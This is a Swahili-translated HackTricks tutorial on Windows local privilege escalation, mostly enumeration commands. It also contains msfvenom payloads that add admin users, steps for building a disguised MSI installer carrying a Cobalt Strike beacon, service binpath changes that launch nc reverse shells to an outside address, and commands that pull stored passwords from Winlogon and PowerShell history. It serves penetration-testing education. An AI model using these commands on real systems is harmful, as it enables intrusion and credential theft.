HackTricksWindows Local Privilege Escalation
Reading time: 58 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Chombo bora cha kutafuta Windows local privilege escalation vectors: WinPEAS
Nadharia ya Mwanzo ya Windows
Access Tokens
Ikiwa haufahamu Windows Access Tokens, soma ukurasa ufuatao kabla ya kuendelea:
ACLs - DACLs/SACLs/ACEs
Angalia ukurasa ufuatao kwa taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:
Integrity Levels
Ikiwa haufahamu integrity levels katika Windows, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:
Windows Security Controls
Kuna mambo tofauti katika Windows yanayoweza kukuzuia kuorodhesha mfumo, kuendesha executables au hata kutambua shughuli zako. Unapaswa kusoma ukurasa ufuatao na kuorodhesha hizi zote za mbinu za ulinzi kabla ya kuanza upembuzi wa privilege escalation:
System Info
Version info enumeration
Angalia kama toleo la Windows lina udhaifu wowote unaojulikana (angalia pia patches zilizowekwa).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Version Exploits
Tovuti hii site inafaa kwa kutafuta taarifa za kina kuhusu Microsoft security vulnerabilities. Hifadhidata hii ina zaidi ya 4,700 security vulnerabilities, ikionyesha the massive attack surface ambayo mazingira ya Windows yanatoa.
Kwenye mfumo
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas ina watson imejumuishwa)
Kialokalini na taarifa za mfumo
Github repos za exploits:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Mazingira
Kuna credential/Juicy info yoyote iliyohifadhiwa katika env variables?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
Historia ya PowerShell
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Faili za transkripti za PowerShell
Unaweza kujifunza jinsi ya kuamilisha hili kwenye https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Maelezo ya utekelezaji wa PowerShell pipeline yanarekodiwa, ikiwa ni pamoja na amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya output huenda yasirekodiwe.
Ili kuwezesha hili, fuata maelekezo katika sehemu ya "Transcript files" ya nyaraka, ukichagua "Module Logging" badala ya "Powershell Transcription".
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
Ili kuona matukio 15 ya mwisho kutoka kwenye logi za PowersShell unaweza kutekeleza:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
Rekodi kamili ya shughuli na yaliyomo yote ya utekelezaji wa script inarekodiwa, ikihakikisha kwamba kila block ya msimbo imeandikishwa wakati inavyotekelezwa. Mchakato huu unahifadhi njia kamili ya ufuatiliaji ya kila shughuli, ambayo ni muhimu kwa forensiki na uchambuzi wa tabia zenye madhara. Kwa kurekodi shughuli zote wakati wa utekelezaji, hupatikana maarifa ya kina kuhusu mchakato.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Matukio zilizoandikwa za Script Block zinaweza kupatikana ndani ya Windows Event Viewer katika njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
Mipangilio ya Intaneti
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Diski
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
Unaweza kudhoofisha mfumo ikiwa sasisho hazitatafutwa kwa kutumia httpS bali http.
Unaanza kwa kuangalia kama mtandao unatumia non-SSL WSUS update kwa kuendesha yafuatayo katika cmd:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Au yafuatayo katika PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
Ikiwa unapata jibu kama mojawapo ya haya:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Na ikiwa HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer au Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" ni sawa na 1.
Then, it is exploitable. Ikiwa registry ya mwisho ni sawa na 0, basi entry ya WSUS itatawazwa (it will be ignored).
Ili ku-exploit vulnerabilities hizi unaweza kutumia zana kama: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Kwa msingi, hii ndio flaw ambayo bug hii inatumia:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
Unaweza ku-exploit vulnerability hii kwa kutumia zana WSUSpicious (once it's liberated).
KrbRelayUp
Kuna vulnerability ya local privilege escalation katika mazingira ya Windows domain chini ya masharti maalum. Masharti haya ni pamoja na mazingira ambapo LDAP signing is not enforced, watumiaji wana self-rights zinazoruhusu wao kusanidi Resource-Based Constrained Delegation (RBCD), na uwezo wa watumiaji kuunda computers ndani ya domain. Ni muhimu kutambua kuwa mahitaji haya (requirements) yanatimizwa kwa default settings.
Find the exploit in https://github.com/Dec0ne/KrbRelayUp
Kwa taarifa zaidi kuhusu mtiririko wa attack angalia https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If hizi registry mbili ziko enabled (thamani ni 0x1), basi watumiaji wa aina yoyote ya ruhusa wanaweza install (execute) *.msi files kama NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
Iwapo una kikao cha meterpreter unaweza kuendesha kiotomatiki mbinu hii kwa kutumia module exploit/windows/local/always_install_elevated
PowerUP
Tumia amri ya Write-UserAddMSI kutoka power-up kuunda ndani ya saraka ya sasa binari ya Windows MSI ili kupandisha ruhusa. Script hii inaandika msanidi MSI uliotangulia ambayo itauliza kuongeza mtumiaji/kikundi (hivyo utahitaji GIU access):
Write-UserAddMSI
Tekeleza tu binary iliyoundwa ili kuongeza ruhusa.
MSI Wrapper
Soma mafunzo haya kujifunza jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka unaweza kufunika faili ".bat" ikiwa unataka tu kutekeleza mistari ya amri
Create MSI with WIX
Create MSI with Visual Studio
- Tengeneza kwa Cobalt Strike au Metasploit new Windows EXE TCP payload katika
C:\privesc\beacon.exe - Fungua Visual Studio, chagua Create a new project na andika "installer" kwenye kisanduku cha utaftaji. Chagua mradi wa Setup Wizard na bonyeza Next.
- Mpatie mradi jina, kama AlwaysPrivesc, tumia
C:\privesckwa eneo, chagua place solution and project in the same directory, na bonyeza Create. - Endelea kubonyeza Next hadi ufike hatua ya 3 kati ya 4 (chagua faili za kujumuisha). Bonyeza Add na chagua Beacon payload uliyounda. Kisha bonyeza Finish.
- Chagua mradi wa AlwaysPrivesc katika Solution Explorer na kwenye Properties, badilisha TargetPlatform kutoka x86 hadi x64.
- Kuna mali nyingine unaweza kubadilisha, kama Author na Manufacturer ambazo zinaweza kufanya app iliyosakinishwa ionekane halali zaidi.
- Bonyeza kulia kwenye mradi na chagua View > Custom Actions.
- Bonyeza kulia Install na chagua Add Custom Action.
- Bonyeza mara mbili kwenye Application Folder, chagua faili yako ya beacon.exe na bonyeza OK. Hii itahakikisha Beacon payload inatekelezwa mara tu installer inapoendeshwa.
- Chini ya Custom Action Properties, badilisha Run64Bit kuwa True.
- Mwishowe, build it.
- Ikiwa onyo
File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'linaonekana, hakikisha umeweka platform kuwa x64.
MSI Installation
Ili kutekeleza installation ya faili hatari .msi kwa background:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
Ili exploit udhaifu huu, unaweza kutumia: exploit/windows/local/always_install_elevated
Antivirus na Vichunguzi
Mipangilio ya Ukaguzi
Mipangilio hii inaamua nini kinachokuwa logged, hivyo unapaswa kuzingatia.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding, inavutia kujua logs zinatumwa wapi
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS imeundwa kwa ajili ya management of local Administrator passwords, kuhakikisha kuwa kila nenosiri ni unique, randomised, and regularly updated kwenye kompyuta zinazounganishwa kwenye domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kupatikana tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, kuwaruhusu kuona local admin passwords ikiwa wameidhinishwa.
WDigest
Ikiwa imewezeshwa, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Protection
Kuanzia na Windows 8.1, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili kuzuia jaribio la michakato isiyoaminika kusoma kumbukumbu yake au kuingiza code, na hivyo kuimarisha usalama wa mfumo.
More info about LSA Protection here.
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard ilianzishwa katika Windows 10. Madhumuni yake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| More info about Credentials Guard here.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domain credentials zinathibitishwa na Local Security Authority (LSA) na hutumika na vipengele vya mfumo wa uendeshaji. Wakati data za kuingia za mtumiaji zinapothibitishwa na registered security package, domain credentials kwa mtumiaji kwa kawaida huanzishwa.
More info about Cached Credentials here.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Watumiaji na Makundi
Orodhesha Watumiaji na Makundi
Unapaswa kukagua kama katika makundi unayomo kuna ruhusa za kuvutia
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Vikundi vya walio na ruhusa za juu
Ikiwa uko katika kundi fulani la walio na ruhusa za juu unaweza kupandisha ruhusa. Jifunze kuhusu vikundi vya walio na ruhusa za juu na jinsi ya kuvifanyia matumizi mabaya ili kupandisha ruhusa hapa:
Uendeshaji wa token
Jifunze zaidi kuhusu ni nini token kwenye ukurasa huu: Windows Tokens.
Tazama ukurasa uliofuata ili ujifunze kuhusu tokens zinazovutia na jinsi ya kuzitumia vibaya:
Watumiaji walioingia / Vikao
qwinsta
klist sessions
Folda za nyumbani
dir C:\Users
Get-ChildItem C:\Users
Sera ya Password
net accounts
Pata yaliyomo kwenye clipboard
powershell -command "Get-Clipboard"
Michakato Inayoendelea
Ruhusa za Faili na Folda
Kwanza kabisa, kwa kuorodhesha michakato angalia passwords ndani ya mstari wa amri wa mchakato.
Angalia ikiwa unaweza kuandika juu ya binary inayokimbia au ikiwa una ruhusa za kuandika kwa folda ya binary ili kufaidika na DLL Hijacking attacks:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Daima angalia uwezekano wa electron/cef/chromium debuggers zinazokimbia; unaweza kuvitumia vibaya kuongezea ruhusa.
Kukagua ruhusa za binaries za michakato
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Kukagua ruhusa za folda za binaries za michakato (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)
Uchimbaji wa password za kumbukumbu
Unaweza kuunda dump ya kumbukumbu ya mchakato unaoendelea kwa kutumia procdump kutoka kwa sysinternals. Huduma kama FTP zina credentials katika maandishi wazi kwenye kumbukumbu, jaribu kufanya dump ya kumbukumbu na kusoma credentials.
procdump.exe -accepteula -ma <proc_name_tasklist>
Programu za GUI zisizo salama
Programu zinazotendeshwa kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.
Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza kwenye "Click to open Command Prompt"
Huduma
Pata orodha ya huduma:
net start
wmic service list brief
sc query
Get-Service
Permissions
Unaweza kutumia sc kupata taarifa za huduma
sc qc <service_name>
Inashauriwa kuwa na binary accesschk kutoka Sysinternals ili kukagua ngazi ya ruhusa inayohitajika kwa kila huduma.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
Inashauriwa kukagua ikiwa "Authenticated Users" wanaweza kubadilisha huduma yoyote:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
Unaweza kupakua accesschk.exe kwa XP hapa
Wezesha huduma
Ikiwa unapata kosa hili (kwa mfano na SSDPSRV):
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
Unaweza kuiwezesha kwa kutumia
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Kumbuka kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)
Njia mbadala nyingine ya tatizo hili ni kuendesha:
sc.exe config usosvc start= auto
Badilisha njia ya binary ya huduma
Katika tukio ambapo kundi la "Authenticated users" lina SERVICE_ALL_ACCESS kwenye huduma, inawezekana kubadilisha binary inayotekelezwa ya huduma. Ili kubadilisha na kutekeleza sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Anzisha upya huduma
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Inawezekana kupata ruhusa za juu kupitia ruhusa mbalimbali:
- SERVICE_CHANGE_CONFIG: Inaruhusu kurekebisha usanidi wa binary ya service.
- WRITE_DAC: Inaruhusu upya wa ruhusa, ikiruhusu kubadilisha usanidi wa service.
- WRITE_OWNER: Inaruhusu upataji umiliki na kurekebisha ruhusa.
- GENERIC_WRITE: Inarithi uwezo wa kubadilisha usanidi wa service.
- GENERIC_ALL: Pia inarithi uwezo wa kubadilisha usanidi wa service.
Kwa utambuzi na matumizi ya udhaifu huu, exploit/windows/local/service_permissions inaweza kutumika.
Ruhusa dhaifu za binaries za service
Angalia kama unaweza kubadilisha binary inayotekelezwa na service au ikiwa una uruhusa za kuandika kwenye folda ambapo binary iko (DLL Hijacking).
Unaweza kupata kila binary inayotekelezwa na service kwa kutumia wmic (not in system32) na kuangalia ruhusa zako kwa kutumia icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
Unaweza pia kutumia sc na icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Services registry modify permissions
Unapaswa kuangalia kama unaweza kubadilisha service registry yoyote.
Unaweza kuangalia uruhusa zako juu ya service registry kwa kufanya:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
Inapaswa kukaguliwa kama Authenticated Users au NT AUTHORITY\INTERACTIVE wanamiliki ruhusa za FullControl. Ikiwa hivyo, binary inayotekelezwa na service inaweza kubadilishwa.
Ili kubadilisha njia ya binary inayotekelezwa:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Ruhusa za AppendData/AddSubdirectory kwenye rejista ya Services
Kama una ruhusa hii kwenye rejista, inamaanisha kuwa unaweza kuunda rejista ndogo kutoka hii. Katika kesi ya Windows services, hili ni enough to execute arbitrary code:
AppendData/AddSubdirectory permission over service registry
Njia za Service zisizo na nukuu
Ikiwa path ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu kabla ya nafasi.
Kwa mfano, kwa path C:\Program Files\Some Folder\Service.exe Windows itajaribu kutekeleza:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
Orodhesha njia zote za huduma zisizo na nukuu, ukiondoa zile za huduma za Windows zilizojengwa:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Unaweza kugundua na ku-exploit udhaifu huu kwa metasploit: exploit/windows/local/trusted\_service\_path Unaweza kuunda kwa mikono binari ya huduma kwa metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
Hatua za Urejesho
Windows inaruhusu watumiaji kubainisha hatua zitakazochukuliwa ikiwa service itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwa binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana kwenye nyaraka rasmi.
Programu
Programu Zilizowekwa
Angalia permissions of the binaries (labda unaweza overwrite moja na escalate privileges) na of the folders (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Ruhusa za Kuandika
Angalia kama unaweza kubadilisha faili fulani ya usanidi ili kusoma faili maalum au kama unaweza kubadilisha binary itakayotekelezwa na akaunti ya Administrator (schedtasks).
Njia ya kupata ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Endeshwa wakati wa kuanzishwa
Angalia ikiwa unaweza kuandika upya registry au binary fulani ambazo zitaendeshwa na mtumiaji tofauti.
Soma ukurasa ufuatao ili ujifunze zaidi kuhusu maeneo ya autoruns yenye kuvutia ya kupandisha vibali:
Privilege Escalation with Autoruns
Madereva
Tafuta madereva ya pande za tatu zisizo za kawaida/zinazoweza kuwa na udhaifu
driverquery
driverquery.exe /fo table
driverquery /SI
Ikiwa driver huweka wazi arbitrary kernel read/write primitive (kawaida katika IOCTL handlers zilizobuniwa vibaya), unaweza escalate kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Angalia mbinu hatua‑kwa‑hatua hapa:
Arbitrary Kernel Rw Token Theft
PATH DLL Hijacking
Ikiwa una write permissions inside a folder present on PATH, unaweza kuwa na uwezo wa hijack a DLL loaded by a process na escalate privileges.
Angalia ruhusa za folda zote ndani ya PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu:
Writable Sys Path +Dll Hijacking Privesc
Mtandao
Shares
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Angalia kompyuta nyingine zinazojulikana zilizowekwa hardcoded kwenye hosts file
type C:\Windows\System32\drivers\etc\hosts
Kiolesura za Mtandao & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Bandari Zilizo wazi
Angalia huduma zilizo na vizuizi kutoka nje
netstat -ano #Opened ports?
Jedwali la Routing
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
Jedwali la ARP
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
Kanuni za Firewall
Check this page for Firewall related commands (orodhesha kanuni, unda kanuni, zima, zima...)
Zaidi commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
Binari bash.exe pia inaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Ikiwa unapata root user unaweza kusikiliza kwenye bandari yoyote (wakati wa kwanza utakapotumia nc.exe kusikiliza kwenye bandari itakuuliza kupitia GUI kama nc inapaswa kuruhusiwa na firewall).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Ili kuanzisha bash kama root kwa urahisi, unaweza kujaribu --default-user root
Unaweza kuchunguza filesystem ya WSL katika folda C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Vyeti vya Windows
Vyeti vya Winlogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Msimamizi wa credentials / Windows Vault
Kutoka https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
